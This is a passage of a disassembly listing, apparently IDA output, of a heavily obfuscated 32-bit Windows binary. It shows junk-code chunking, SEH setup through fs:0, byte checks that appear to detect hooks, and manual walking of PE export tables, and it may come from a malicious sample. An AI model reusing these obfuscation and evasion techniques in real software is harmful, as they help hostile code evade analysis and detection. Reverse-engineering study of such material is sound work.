; FUNCTION CHUNK AT 0042D9E8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042DD43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E5A5 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042E9D6 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0042EDA6 SIZE 00000009 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [eax-10h]
and eax, 7
mov [ebp-14h], eax
cmp dword ptr [ebp-10h], 3
jnb loc_428363
jmp loc_423211
sub_428EB9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_428ED6: ; CODE XREF: _0182ofla:0042D0B8�j
jmp loc_426FBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E648
loc_428EDB: ; CODE XREF: sub_42E648:loc_425B87�j
call sub_428D17
mov edx, 19EDC823h
call sub_42D71D
push edx
push 0D9C7174Dh
pop edx
jmp loc_42A7DA
; END OF FUNCTION CHUNK FOR sub_42E648
; =============== S U B R O U T I N E =======================================
sub_428EF6 proc near ; CODE XREF: sub_425DA5+7�p
mov [esp+0], edx
pop edx
cmp dword ptr [ebp-8], 0
jnz loc_423CED
call sub_4232CD
sub_428EF6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42C7FE
loc_428F09: ; CODE XREF: sub_42C7FE:loc_42A390�j
jmp loc_42B2CE
; END OF FUNCTION CHUNK FOR sub_42C7FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_428F0F proc near ; CODE XREF: sub_42448C+4984�p
; sub_426993+7BB7�j
; FUNCTION CHUNK AT 004232AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423ADF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042711E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C4E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042ACC4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CE3D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042E5E3 SIZE 0000000F BYTES
mov [esp+0], edi
pop edi
pop ebx
cmp ds:dword_4257A4, 0
jmp loc_4283D2
sub_428F0F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428F20 proc near ; CODE XREF: sub_428D09�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423086 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042337C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042356F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423AE4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423B33 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423B86 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004244D7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424599 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004246A6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424DC2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424F21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A76 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425E80 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426189 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426415 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042653E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004270A8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427861 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004285A8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00428C1C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00428CE0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042930E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429811 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429A8B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429CCC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042A14C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042A4B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AB80 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042B1E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B2AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B8DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C147 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042D11E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DD84 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042E304 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E833 SIZE 0000000E BYTES
push ebx
mov ebx, ebp
jmp loc_42B636
sub_428F20 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edi, 0C0D3FFF0h
sub esi, 0FA295ED6h
jmp sub_425153
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D730
loc_428F38: ; CODE XREF: sub_42D730-73E3�j
xchg ebx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42D730
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_428F3C: ; CODE XREF: sub_424E6E+2CAB�j
jmp loc_42390D
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265C0
loc_428F41: ; CODE XREF: sub_4265C0-2E2C�j
jmp loc_42442E
; END OF FUNCTION CHUNK FOR sub_4265C0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428F46 proc near ; CODE XREF: sub_423AF2+73BA�j
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004230C2 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00423D28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424164 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004250E4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004251EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425731 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00425998 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425A56 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004261B0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426A0E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004278CC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00429FBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A219 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042E4C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EB13 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
jmp loc_429FBE
sub_428F46 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_428F4F: ; CODE XREF: sub_4282B8-2E06�j
pop edx
and edx, 0B3FD71BEh
sub edx, 919E5FA4h
cmp edx, 969FD777h
jmp loc_42C13A
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428F67: ; CODE XREF: sub_42798F-2A7A�j
jz loc_42595F
jmp loc_425315
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB53
loc_428F72: ; CODE XREF: sub_42CB53-7332�j
push offset sub_42430D
jmp nullsub_227
; END OF FUNCTION CHUNK FOR sub_42CB53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_428F7C: ; CODE XREF: sub_423861:loc_4291B0�j
cmp ds:dword_42B8F8[eax*4], 0
jz loc_42D816
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0CFh
jz loc_42A2ED
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0E9h
jz loc_42A2ED
jmp loc_426BA9
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425063
loc_428FA7: ; CODE XREF: sub_425063:loc_425917�j
call sub_42E218
cmp dword ptr [ebp-0Ch], 0
jz loc_424680
jmp loc_429F9E
; END OF FUNCTION CHUNK FOR sub_425063
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_428FBC: ; CODE XREF: sub_42B15E-7931�j
jmp loc_4233BF
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_428FC1: ; CODE XREF: sub_42798F:loc_429BAF�j
push offset loc_42C212
jmp loc_42AA7B
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
sbb eax, 8F898C71h
jmp loc_426AC3
; =============== S U B R O U T I N E =======================================
sub_428FD6 proc near ; CODE XREF: _0182ofla:loc_42A104�p
; sub_42ADE3+26B9�p
var_8 = dword ptr -8
jnz sub_429C68
push ebp
mov ebp, esp
pushf
mov [esp+8+var_8], ecx
loc_428FE3: ; CODE XREF: _0182ofla:loc_427038�j
call sub_42940E
sub_428FD6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42966F
loc_428FE8: ; CODE XREF: sub_42966F+16�j
jmp loc_42E413
; END OF FUNCTION CHUNK FOR sub_42966F
; =============== S U B R O U T I N E =======================================
sub_428FED proc near ; DATA XREF: sub_425BF8-27A1�o
; FUNCTION CHUNK AT 00429F07 SIZE 00000005 BYTES
xor edx, [ebx+ecx+4]
cmp edx, 7C61090Eh
jmp loc_429F07
sub_428FED endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_428FFC: ; CODE XREF: sub_425BF8:loc_425710�j
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
loc_429002: ; CODE XREF: sub_42660C:loc_4271EF�j
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_42AE31
jmp loc_42567C
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429013: ; CODE XREF: sub_42798F+6CF5�j
or ecx, edx
add ecx, edx
jz loc_427EAA
jmp loc_4244E9
; ---------------------------------------------------------------------------
loc_429022: ; CODE XREF: sub_42798F:loc_42ABE9�j
cmp dword ptr [ebp-4], 3
jmp loc_4249A0
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
xor ebp, esi
jmp sub_42719D
; ---------------------------------------------------------------------------
loc_429032: ; CODE XREF: _0182ofla:00429F61�j
ja locret_42674C
; =============== S U B R O U T I N E =======================================
sub_429038 proc near ; CODE XREF: _0182ofla:loc_4283CC�j
; sub_428F20+DBA�p
; FUNCTION CHUNK AT 004236DA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B722 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C390 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
mov eax, [eax]
push eax
call sub_427239
jmp loc_42C390
sub_429038 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_429049: ; CODE XREF: sub_428041:loc_42595F�j
push 0
jmp loc_424013
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
sbb esi, edx
jmp sub_425126
; ---------------------------------------------------------------------------
loc_429057: ; CODE XREF: _0182ofla:0042A8DE�j
jbe loc_42B1FC
; =============== S U B R O U T I N E =======================================
sub_42905D proc near ; CODE XREF: sub_42D5EF-6EE7�p
xchg esi, [esp+0]
pop esi
call sub_424CD8
call sub_425126
locret_42906B: ; CODE XREF: sub_42ACCF:loc_429D17�j
retn
sub_42905D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42906C: ; CODE XREF: _0182ofla:0042D500�j
jmp loc_42E760
; =============== S U B R O U T I N E =======================================
sub_429071 proc near ; CODE XREF: sub_42D056:loc_425F8B�p
; _0182ofla:0042A97A�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00427F1E SIZE 0000000F BYTES
xchg ebx, [esp+8+var_8]
pop ebx
call sub_423FCD
test al, al
jz loc_427F1E
call sub_426B60
retn
sub_429071 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_429088: ; CODE XREF: sub_425B00:loc_42D073�j
call sub_4254D3
pop ecx
mov [ebp-20h], eax
jmp loc_42644B
; ---------------------------------------------------------------------------
loc_429096: ; CODE XREF: sub_425B00:loc_42AFA1�j
test byte ptr [ebp-8], 40h
jz loc_42A779
push ebp
jmp loc_42CB94
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_4290A6: ; CODE XREF: sub_42C379-F66�j
xchg edx, [esp+8+var_8]
jmp loc_429309
; END OF FUNCTION CHUNK FOR sub_42C379
; =============== S U B R O U T I N E =======================================
sub_4290AE proc near ; CODE XREF: sub_4277D0+11�j
; sub_42794C+B�p
xchg edi, [esp+0]
pop edi
mov eax, [ebp-4]
push offset loc_425FD5
jmp nullsub_51
sub_4290AE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_4290BF: ; CODE XREF: sub_4289E4:loc_423244�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-0Ch], eax
xor eax, eax
loc_4290CF: ; CODE XREF: _0182ofla:0042C2C2�j
jmp loc_428394
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_4290D4: ; CODE XREF: sub_42B15E-3CBB�j
jz loc_428BDA
cmp edx, 58C16763h
jmp loc_423533
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
locret_4290E5: ; CODE XREF: _0182ofla:loc_425B8C�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_4290E6: ; CODE XREF: sub_42C718-2959�j
jmp loc_4270C1
; END OF FUNCTION CHUNK FOR sub_42C718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_4290EB: ; CODE XREF: sub_42B1F9-6CCB�j
jmp loc_42A4E6
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_4290F0: ; CODE XREF: sub_42EAB7+16�j
inc dword ptr [ebp-20h]
push offset loc_425759
jmp loc_42DFB6
; END OF FUNCTION CHUNK FOR sub_42EAB7
; =============== S U B R O U T I N E =======================================
sub_4290FD proc near ; DATA XREF: sub_428F0F-5C5F�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004236C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E0EC SIZE 00000016 BYTES
push ebx
push 2FCA8751h
xchg ebp, [esp+8+var_8]
adc ebx, 880CCD24h
jmp loc_4236C0
sub_4290FD endp
; ---------------------------------------------------------------------------
xchg ebp, [eax]
jmp sub_426295
; ---------------------------------------------------------------------------
xchg ebx, eax
jmp sub_429A98
; ---------------------------------------------------------------------------
loc_42911F: ; CODE XREF: _0182ofla:00426392�j
jz loc_4274F4
jmp loc_42A111
; ---------------------------------------------------------------------------
loc_42912A: ; CODE XREF: _0182ofla:0042E91B�j
popf
; =============== S U B R O U T I N E =======================================
sub_42912B proc near ; CODE XREF: sub_42C1D1-636B�p
; FUNCTION CHUNK AT 0042767D SIZE 0000000A BYTES
mov [esp+0], eax
pop eax
setz al
call sub_42ECAD
pop ecx
jmp loc_42767D
sub_42912B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42913D proc near ; DATA XREF: sub_425BED+1C56�o
mov ebx, [eax+4]
mov eax, [eax]
call sub_425BED
loc_429147: ; DATA XREF: sub_423861+C21�o
cmp byte ptr [eax], 0CFh
jz loc_42A2ED
mov eax, [ebp-4]
cmp byte ptr [eax], 0E9h
jz loc_42A2ED
mov eax, [ebp-4]
loc_42915F: ; CODE XREF: _0182ofla:loc_425617�j
jmp loc_42A037
sub_42913D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_429164: ; CODE XREF: sub_423861:loc_42386A�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
jmp loc_4291B0
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42583B
loc_42916F: ; CODE XREF: sub_42583B:loc_426ED5�j
jnb loc_4291B0
pop eax
jmp loc_42C924
; END OF FUNCTION CHUNK FOR sub_42583B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42917B: ; CODE XREF: sub_428EB9+5B41�j
setz al
call sub_42ECAD
pop ecx
shl eax, 3
mov edx, [ebp+8]
jmp loc_427996
; ---------------------------------------------------------------------------
loc_42918F: ; CODE XREF: sub_428EB9:loc_42E9E2�j
cmp dword ptr [ebp-10h], 0
jnz loc_42AC56
mov eax, [ebp+8]
jmp loc_42ABCE
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
locret_4291A1: ; CODE XREF: _0182ofla:004292C9�j
retn
; ---------------------------------------------------------------------------
loc_4291A2: ; CODE XREF: _0182ofla:0042A357�j
jb loc_4258E7
or ecx, esi
jmp sub_42B860
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_4291B0: ; CODE XREF: sub_423861+5909�j
; sub_42583B:loc_42916F�j
jmp loc_428F7C
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_4291B5: ; CODE XREF: sub_42380D+477C�j
jmp loc_42A7FD
; END OF FUNCTION CHUNK FOR sub_42380D
; =============== S U B R O U T I N E =======================================
sub_4291BA proc near ; CODE XREF: sub_42E689-463A�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004237F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425376 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042539E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004255DF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427611 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00428097 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042985F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042CF82 SIZE 00000005 BYTES
push dword ptr fs:0
mov fs:0, esp
jmp loc_425376
sub_4291BA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4291CC: ; CODE XREF: sub_42798F+326A�j
jmp loc_424ED2
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_4291D1: ; CODE XREF: _0182ofla:004254C3�j
jmp loc_4283D7
; ---------------------------------------------------------------------------
loc_4291D6: ; DATA XREF: sub_42798F+11�o
push ecx
push 0DC85ABC3h
; START OF FUNCTION CHUNK FOR sub_4278DB
loc_4291DC: ; CODE XREF: sub_4278DB-74F�j
pop ecx
xor ecx, 7AE8986Ah
add ecx, 59D57B68h
xchg ecx, [esp-8+arg_4]
jmp loc_42AD2E
; END OF FUNCTION CHUNK FOR sub_4278DB
; =============== S U B R O U T I N E =======================================
sub_4291F1 proc near ; DATA XREF: sub_42798F-1148�o
xchg edx, [esp+0]
retn
sub_4291F1 endp
; =============== S U B R O U T I N E =======================================
sub_4291F5 proc near ; DATA XREF: sub_42798F-114D�o
; FUNCTION CHUNK AT 0042D368 SIZE 00000005 BYTES
add edx, 0EB5640AFh
xchg edx, [esp+0]
jmp loc_42D368
sub_4291F5 endp
; =============== S U B R O U T I N E =======================================
sub_429203 proc near ; DATA XREF: sub_42798F+5167�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042557B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00429EB9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042A204 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CDAE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D4D9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042D99F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E5CE SIZE 00000005 BYTES
cmp byte ptr [ebp-5], 0
jnz loc_429D23
jmp loc_42A204
sub_429203 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_429213: ; CODE XREF: sub_4271D2+D�j
mov eax, ds:dword_423194
or eax, eax
jnz loc_42C6DB
jmp loc_42505E
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
loc_429226: ; CODE XREF: _0182ofla:004263E1�j
shr ebx, 2
loc_429229: ; CODE XREF: _0182ofla:loc_42E32B�j
mov eax, [ebp-4]
xor edx, edx
push edx
jmp loc_42EC92
; ---------------------------------------------------------------------------
xor eax, 3BA50746h
shl ebx, 3
jmp sub_42E648
; =============== S U B R O U T I N E =======================================
sub_429242 proc near ; CODE XREF: _0182ofla:0042B03E�p
; FUNCTION CHUNK AT 00424239 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004266A1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042972D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B159 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B85A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E248 SIZE 00000007 BYTES
push dword ptr fs:0
mov fs:0, esp
loc_42924E: ; CODE XREF: _0182ofla:0042CADC�j
jmp loc_42E248
sub_429242 endp
; ---------------------------------------------------------------------------
adc ebx, esi
jmp sub_42349B
; ---------------------------------------------------------------------------
loc_42925A: ; DATA XREF: _0182ofla:loc_4245A8�o
push 0BC4FF081h
mov [esp], edx
push offset sub_42DA0D
jmp loc_4230A7
; =============== S U B R O U T I N E =======================================
sub_42926C proc near ; CODE XREF: sub_42DB2E:loc_42DB44�j
add esp, 0FFFFFFECh
cmp ds:byte_427A00, 0
jnz loc_4260AA
lea edx, [ebp-14h]
mov eax, offset dword_427A08
call sub_42B14D
push offset loc_42A73B
jmp nullsub_151
sub_42926C endp
; ---------------------------------------------------------------------------
push eax
ror eax, 19h
mov ds:dword_427144, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCE0
loc_42929E: ; CODE XREF: sub_42938A:loc_4246D4�j
; sub_42CCE0+8�j
rol eax, 19h
jmp loc_42D72B
; END OF FUNCTION CHUNK FOR sub_42CCE0
; ---------------------------------------------------------------------------
loc_4292A6: ; DATA XREF: sub_426571-F64�o
mov ds:dword_424C1C, eax
xor eax, eax
push edx
push 8EFA1547h
jmp loc_428DE9
; ---------------------------------------------------------------------------
loc_4292B8: ; CODE XREF: _0182ofla:00424D2E�j
jge loc_423BB5
jnz loc_424195
loc_4292C4: ; CODE XREF: _0182ofla:loc_42E7FA�j
push offset sub_424F35
jmp locret_4291A1
; ---------------------------------------------------------------------------
and ebx, eax
jmp sub_428245
; ---------------------------------------------------------------------------
loc_4292D5: ; CODE XREF: _0182ofla:0042D98F�j
jbe loc_42D9C8
jl loc_428B6E
; =============== S U B R O U T I N E =======================================
sub_4292E1 proc near ; CODE XREF: _0182ofla:0042881B�p
; FUNCTION CHUNK AT 00424ADD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042EC67 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
lea eax, [ebp-400h]
xchg eax, esi
push esi
xchg eax, esi
jmp loc_424ADD
sub_4292E1 endp
; ---------------------------------------------------------------------------
xchg eax, esi
push esi
xchg eax, esi
ror eax, 12h
mov ds:dword_424BF8, eax
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C2F0
loc_429304: ; CODE XREF: sub_42C2F0+14�j
jmp loc_42766D
; END OF FUNCTION CHUNK FOR sub_42C2F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_429309: ; CODE XREF: sub_42C379-32D0�j
jmp sub_424CD8
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42930E: ; CODE XREF: sub_428F20:loc_427861�j
jmp loc_4283D7
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_429313: ; CODE XREF: sub_425BF8+91A9�j
jz loc_4263AD
; END OF FUNCTION CHUNK FOR sub_425BF8
; START OF FUNCTION CHUNK FOR sub_42D056
loc_429319: ; CODE XREF: sub_42D056:loc_42987B�j
jmp loc_429E7E
; END OF FUNCTION CHUNK FOR sub_42D056
; =============== S U B R O U T I N E =======================================
sub_42931E proc near ; CODE XREF: sub_425EEB+6�p
; _0182ofla:00428836�j
; FUNCTION CHUNK AT 004261BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004263E6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426E74 SIZE 0000001E BYTES
xchg esi, [esp+0]
pop esi
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
jmp loc_4261BB
sub_42931E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_429330: ; CODE XREF: _0182ofla:0042D9C3�j
retn
; ---------------------------------------------------------------------------
loc_429331: ; DATA XREF: _0182ofla:0042D3FF�o
add edx, ebp
add edx, 31E74479h
mov edx, [edx]
xchg eax, [edx]
jmp loc_42EAD2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB27
loc_429343: ; CODE XREF: sub_42AB27+C�j
jmp loc_4293E6
; END OF FUNCTION CHUNK FOR sub_42AB27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42768C
loc_429348: ; CODE XREF: sub_42768C+23�j
jmp loc_42D250
; END OF FUNCTION CHUNK FOR sub_42768C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CE60
loc_42934D: ; CODE XREF: sub_42CE60:loc_42A1C4�j
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42CE60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242AC
loc_429351: ; CODE XREF: sub_4242AC+8�j
jmp loc_42E805
; END OF FUNCTION CHUNK FOR sub_4242AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_429356: ; CODE XREF: sub_425DA5-241E�j
jmp loc_42CD54
; END OF FUNCTION CHUNK FOR sub_425DA5
; =============== S U B R O U T I N E =======================================
sub_42935B proc near ; CODE XREF: _0182ofla:00428DBB�p
; _0182ofla:loc_42D218�j
pushf
push offset loc_425DB1
jmp loc_428777
sub_42935B endp
; ---------------------------------------------------------------------------
call sub_42A4C6
loc_42936B: ; CODE XREF: _0182ofla:0042B0FE�j
jmp loc_4234CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_429370: ; CODE XREF: sub_4298DD-4FA8�j
jge loc_425575
loc_429376: ; CODE XREF: sub_42C1B2:loc_42D274�j
shl ecx, 14h
adc eax, 83637FD0h
jnb loc_42B8BE
jmp loc_42C9BF
; END OF FUNCTION CHUNK FOR sub_4298DD
; =============== S U B R O U T I N E =======================================
sub_42938A proc near ; DATA XREF: sub_42D056-473E�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004242C4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004246D4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042618E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426BFB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00427123 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428990 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B8D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C351 SIZE 0000001A BYTES
add eax, 7D0h
mov [ebp-8], eax
push edx
push 25DCDB58h
jmp loc_428990
sub_42938A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA2D
loc_42939D: ; CODE XREF: sub_42DA2D-80DF�j
shl eax, 2
